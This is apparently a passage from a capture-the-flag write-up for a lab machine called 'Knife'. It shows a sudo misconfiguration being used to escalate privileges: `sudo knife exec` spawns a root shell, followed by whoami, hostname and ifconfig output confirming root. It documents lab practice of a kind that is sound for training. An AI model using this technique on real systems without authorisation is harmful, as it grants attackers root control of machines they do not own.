Knife
As discovered previously, the target system is hosting an instance of Chef and the james user is able to execute /usr/bin/knife with sudo privileges
according to gtfobins, Knife can be abused for privilege escalation
james@knife:/opt/chef-workstation/bin$ sudo /usr/bin/knife exec -E 'exec "/bin/sh"'
# whoami
whoami
root
# hostname
hostname
knife
# ifconfig
ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.10.242 netmask 255.255.255.0 broadcast 10.10.10.255
inet6 dead:beef::250:56ff:feb9:747b prefixlen 64 scopeid 0x0<global>
inet6 fe80::250:56ff:feb9:747b prefixlen 64 scopeid 0x20<link>
ether 00:50:56:b9:74:7b txqueuelen 1000 (Ethernet)
RX packets 1068418 bytes 189834969 (189.8 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 1097079 bytes 409478750 (409.4 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 3688171 bytes 420427411 (420.4 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 3688171 bytes 420427411 (420.4 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0System Level Compromise